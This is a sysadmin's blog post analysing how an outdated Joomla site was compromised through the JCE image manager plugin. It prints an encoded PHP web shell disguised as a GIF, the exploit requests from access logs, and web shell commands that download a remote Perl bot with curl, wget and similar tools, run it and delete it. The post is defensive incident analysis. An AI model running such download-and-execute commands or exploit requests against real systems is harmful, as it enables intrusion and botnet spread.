Uploaded and executed perl script through old Joomla vulnerability

Written by - 0 comments

Published on February 10th 2014 - Listed in Hacks Linux Internet


Being a Linux admin running multiple web servers always forcibly puts me in the game hackers vs. systems. It's an endless game without any winners.

“How art thou out of breath when thou hast breath To say to me that thou art out of breath?”
- William Shakespeare

That's definitely a quote which fits such situations. I also have to say that in the past, 99% of all hacks I've had to handle were because of old and unpatched public Content Management Systems, especially old Joomla's. While the end user (who's actually responsible for installing and maintaining the application) mostly doesn't give a damn about updates, it's the sys admin who does the work at the end.

This particular hack occurred a few weeks ago on a web server when I received an alert about the server's load. I also checked the network traffic and the graphs confirmed a great anormaly:

CPU Load Network

After a few minutes I found the responsible website (thanks to Apache server-status and lsof) which was being attacked and found several files recently modified/uploaded in one of the websites subfolders through the CMS:

ls -ltr | tail
-rw-r--r-- 1 www-data www-data  182880 Mar  9  2013 red_power.jpg
-rw-r--r-- 1 www-data www-data  299881 Mar  9  2013 strandstrukturen.jpg
-rw-r--r-- 1 www-data www-data  185763 Mar  9  2013 nuts_verflssigt.jpg
-rw-r--r-- 1 www-data www-data    1515 Dec 14 22:12 localhost.php
-rw-r--r-- 1 www-data www-data    1515 Dec 14 22:12 iam.gif
-rw-r--r-- 1 www-data www-data    1520 Dec 19 20:08 bkht.gif
-rw-r--r-- 1 www-data www-data    1635 Jan 20 10:29 viar.gif
-rw-r--r-- 1 www-data www-data  207194 Jan 29 03:35 v.php
-rw-r--r-- 1 www-data www-data    1521 Jan 29 07:07 food.php
-rw-r--r-- 1 www-data www-data    1521 Jan 29 07:07 food.gif

Let's take a look at food.gif - which is supposed to be a binary file by the way:

cat food.gif
GIF89aGlobex
[...]

Yeah that's what I actually expected to find. It's a "fake" gif which just starts with the GIF header. But because the web server doesn't execute PHP code from a file without a php file extension, this won't harm the system that much. More interesting was food.php, which looks like this:

cat food.php
GIF89aGlobex
JQdLfz1WnQgp84AySJACaggwfY1YlSSWgy6lx68TbSqLIhFMUOARF3JyiEyUrFgN+3koTo67NC0yuqmNqmTBSm0Xh5KHJK/s+z3YahDZsWq4iZROg3mIosoNLxNyrN1elpikTt6Ug9X8QgmjMpdWU85sznkZHbR+Sc2MdBkTNU3tsGIYWcC/SeN54iutZn5j0V5SZMXm1vuArINLi495Ou/3v9VsBJvjAyV2nnXdNcmGgwNM6+jYLLloBWLQu7ZekbEbzzk3C7ayHhnHWl+uzsBBy+J1fHc44PR1FWkh4waOYbyGEu8O7KyRncNPPrDYUnRMjAb+iy6mKHDnBltqiSawdncwPyQUSev2VTMVY1CyDPfCE2TLmHnooypamdbEgCj4Mhwsr4MzTw/Jkz16z1Wuh75uGc6IpaxJFpm9teq1SSq2Pk6/NhO0Yj+wrDXu+Zh9c6mPkexJZlDUTl+6sU0279JvBU7WGEmK74UgvwmDmjQQ1AQAYLNve7OAN9wsGi6aoANfa5/wdqUSPOT2XmE3AMFm/a8E+Q7UXq7JXp5rLwL/Dw==')))); ?>

The content of food.php is actually the same as food.gif. As hackers often do, they encode the whole PHP source code. By decoding the whole stuff, the following source code is revealed:

Source Code Hack Form 

Well this does look like a small PHP shell script. Let's look at it in the browser:

Small PHP Upload Hack Form

Cute :-).
The steps that followed were causing the huge load.
The hacker not just simply executed some commands. No. The hacker used a method to download a remote perl script and then execute this perl script from this form:

27.111.90.4 - - [29/Jan/2014:07:07:51 +0100] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 200 36 "-" "BOT/0.1 (BOT for JCE)"
27.111.90.4 - - [29/Jan/2014:07:07:51 +0100] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1" 200 50 "-" "BOT/0.1 (BOT for JCE)"
27.111.90.4 - - [29/Jan/2014:07:07:55 +0100] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 200 36 "-" "BOT/0.1 (BOT for JCE)"
27.111.90.4 - - [29/Jan/2014:07:07:54 +0100] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1" 200 50 "-" "BOT/0.1 (BOT for JCE)"
27.111.90.4 - - [29/Jan/2014:07:08:08 +0100] "GET /images/stories/food.php?rf HTTP/1.1" 200 2455 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
27.111.90.4 - - [29/Jan/2014:07:08:10 +0100] "GET /images/stories/food.php?cmd=curl+-C+-+-O+http://www.vigap.com.mx/wp-content/themes/delegate/lang/robot.log%3Bperl+robot.log%3Brm+robot.log HTTP/1.1" 200 851 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
27.111.90.4 - - [29/Jan/2014:07:08:11 +0100] "GET /images/stories/food.php?cmd=wget++http://www.vigap.com.mx/wp-content/themes/delegate/lang/robot.log%3Bperl+robot.log%3Brm+robot.log HTTP/1.1" 200 851 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
27.111.90.4 - - [29/Jan/2014:07:08:12 +0100] "GET /images/stories/food.php?cmd=fetch++http://www.vigap.com.mx/wp-content/themes/delegate/lang/robot.log%3Bperl+robot.log%3Brm+robot.log HTTP/1.1" 200 851 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
27.111.90.4 - - [29/Jan/2014:07:08:13 +0100] "GET /images/stories/food.php?cmd=lwp-download++http://www.vigap.com.mx/wp-content/themes/delegate/lang/robot.log%3Bperl+robot.log%3Brm+robot.log HTTP/1.1" 200 851 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"

I manually accessed the URL where the perl bot was downloaded from and this is how the bot script looked like:

Hack Perl Bot

On the system, several hundred processes called "/usr/sbin/httpd" were launched (obviously the process name was faked) which were launching the perl bot. Each instance of the bot attacked several websites on the Internet, trying to do the same exact again: Find Joomla vulnerability and hack the website.

Once I disabled the hacked site, it was calm again. And once again, the responsible website was running this:

        var $RELEASE    = '1.5';
        /** @var string Development Status */
        var $DEV_STATUS = 'Stable';
        /** @var int Sub Release Level */
        var $DEV_LEVEL  = '15';
        /** @var int build Number */
        var $BUILD      = '';
        /** @var string Codename */
        var $CODENAME   = 'Wojmamni Ama Mamni';
        /** @var string Date */
        var $RELDATE    = '05-November-2009';

Honestly, I can't blame the hackers. There are so many pseudo-webmasters out there installing once a CMS and then not taking care about it anymore, it's just too easy to commit a hack.


Add a comment

Show form to leave a comment

Comments (newest first)

No comments yet.